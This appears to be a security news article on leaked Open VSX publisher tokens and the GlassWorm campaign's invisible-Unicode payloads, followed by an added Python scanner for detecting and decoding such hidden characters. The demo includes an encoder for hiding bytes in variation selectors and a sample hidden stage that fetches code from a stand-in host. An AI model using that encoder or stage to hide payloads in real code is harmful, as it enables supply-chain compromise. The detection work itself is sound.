Securing the Supply Chain: Safeguarding Access Tokens in Open VSX
The Open VSX registry has moved to lock down access tokens after developers accidentally leaked them in public repositories, a leak that let threat actors publish malicious extensions in a supply chain attack. Wiz researchers disclosed the exposure two weeks ago: more than 550 secrets found across the Microsoft VS Code Marketplace and Open VSX. Some of those tokens granted publish rights to extensions with around 150,000 downloads, enough to push a malicious version to every user who updates, which is what makes a leaked publisher token a supply chain risk rather than an isolated credential problem.
Developed under the Eclipse Foundation, Open VSX is an open-source alternative to Microsoft's Visual Studio Marketplace: a community-run registry of VS Code-compatible extensions used by VS Code forks, including the AI-powered editors Cursor and Windsurf. Some of the leaked tokens were subsequently used in a malware campaign named 'GlassWorm'.
Koi Security researchers described GlassWorm as self-spreading malware whose payload was hidden in invisible Unicode characters, so the injected code did not show up in code review or diff views. It harvested developer credentials and used them to compromise further projects those credentials could reach. It also targeted cryptocurrency wallet data held by 49 extensions, pointing to a financial motive.
The Eclipse Foundation and the Open VSX team responded in a blog post, stating that GlassWorm was not self-replicating, contrary to the 'self-spreading' characterisation, although it did harvest developer credentials. The malicious extensions were removed from the Open VSX registry, and the tokens involved were rotated or revoked to contain the threat.
To shrink the window in which a leaked token is usable, Open VSX plans several measures: shorter token lifetimes, faster revocation workflows, automated security scanning of published extensions, and sharing threat intelligence with other marketplaces.
Although the campaign was contained on Open VSX, Aikido reports that the same threat actors have shifted to GitHub, using the same steganography trick of hiding the malicious payload in invisible Unicode characters. The operation has spread to multiple repositories, mostly JavaScript projects.
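The article describes the hiding technique only as "invisible Unicode characters" and does not say which code points or encoding GlassWorm used. The scanner below is an added example written for this page; it is not code from the article, from Koi Security, Aikido or Open VSX. It flags runs of code points that render as nothing in editors and diff views (zero-width characters, variation selectors, the Tags block), treats a lone selector after an emoji as benign, and, as an assumption about how such a payload might be packed, tries to decode long runs of variation selectors as bytes (VS1–VS16 for 0–15, VS17–VS256 for 16–255). The sample JavaScript and the hidden stage are constructed here for the demonstration.

```python
"""Find and decode invisible-Unicode payloads hidden in source text.

Added example for this article, not the project's own tooling. The code
point ranges and the byte encoding below are assumptions: the article says
only that the payload was hidden in invisible Unicode characters.
"""
from dataclasses import dataclass

# Ranges that are invisible (or nearly so) in most editors and diff views.
INVISIBLE_RANGES = (
    (0x200B, 0x200D),    # zero-width space / non-joiner / joiner
    (0x2060, 0x2064),    # word joiner and invisible operators
    (0xFEFF, 0xFEFF),    # zero-width no-break space (BOM when mid-file)
    (0xFE00, 0xFE0F),    # variation selectors VS1-VS16
    (0xE0000, 0xE007F),  # Tags block (invisible tag characters)
    (0xE0100, 0xE01EF),  # variation selectors supplement VS17-VS256
)

SUSPICIOUS_RUN = 8  # a single VS16 after an emoji is normal; long runs are not


def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    return any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES)


@dataclass
class Finding:
    line: int   # 1-based line number
    col: int    # 0-based column of the first invisible character
    text: str   # the run of invisible characters itself

    @property
    def length(self) -> int:
        return len(self.text)


def find_invisible_runs(source: str) -> list:
    """Return every maximal run of invisible code points, per line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        i = 0
        while i < len(line):
            if is_invisible(line[i]):
                j = i
                while j < len(line) and is_invisible(line[j]):
                    j += 1
                findings.append(Finding(lineno, i, line[i:j]))
                i = j
            else:
                i += 1
    return findings


def decode_variation_selectors(run: str):
    """Assumed packing: VS1-VS16 -> 0-15, VS17-VS256 -> 16-255.
    Returns None if the run contains anything outside those ranges."""
    out = bytearray()
    for ch in run:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
        else:
            return None
    return bytes(out)


def encode_variation_selectors(data: bytes) -> str:
    """Inverse of decode_variation_selectors; used only to build the sample."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16)
                   for b in data)


def scan_source(source: str, min_run: int = SUSPICIOUS_RUN) -> list:
    """Return (Finding, decoded_bytes_or_None) for each suspicious run."""
    return [(f, decode_variation_selectors(f.text))
            for f in find_invisible_runs(source) if f.length >= min_run]


# Constructed sample: a benign emoji with VS16, then a hidden second stage
# (a harmless stand-in string, not real malware) packed into a string literal.
HIDDEN_STAGE = b'fetch("https://example.invalid/stage2").then(r=>r.text())'
SAMPLE_JS = (
    'const banner = "Hi \U0001F44B\uFE0F";\n'
    'const cfg = "' + encode_variation_selectors(HIDDEN_STAGE) + '";\n'
    'module.exports = { banner };\n'
)

if __name__ == "__main__":
    for finding, decoded in scan_source(SAMPLE_JS):
        cps = " ".join(f"U+{ord(c):04X}" for c in finding.text[:4])
        print(f"line {finding.line} col {finding.col}: {finding.length} "
              f"invisible chars ({cps} ...) -> {decoded!r}")
```

Run over a real repository, the threshold matters more than the decoder: a review tool that blocks on any invisible character will drown in emoji variation selectors, while one that ignores them misses exactly the long runs that carry a payload. Pair a scan like this with a file-encoding policy (reject non-ASCII outside string literals and comments) and a publish-time hook in CI, which is where Open VSX's planned automated scanning would sit.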
The pivot to GitHub underscores the ongoing risk across open-source ecosystems: fixes made by a single registry do not end a campaign whose operators move between platforms within weeks. The same vigilance, token hygiene and scanning are needed in every development environment, not just the marketplace where the leak was first noticed.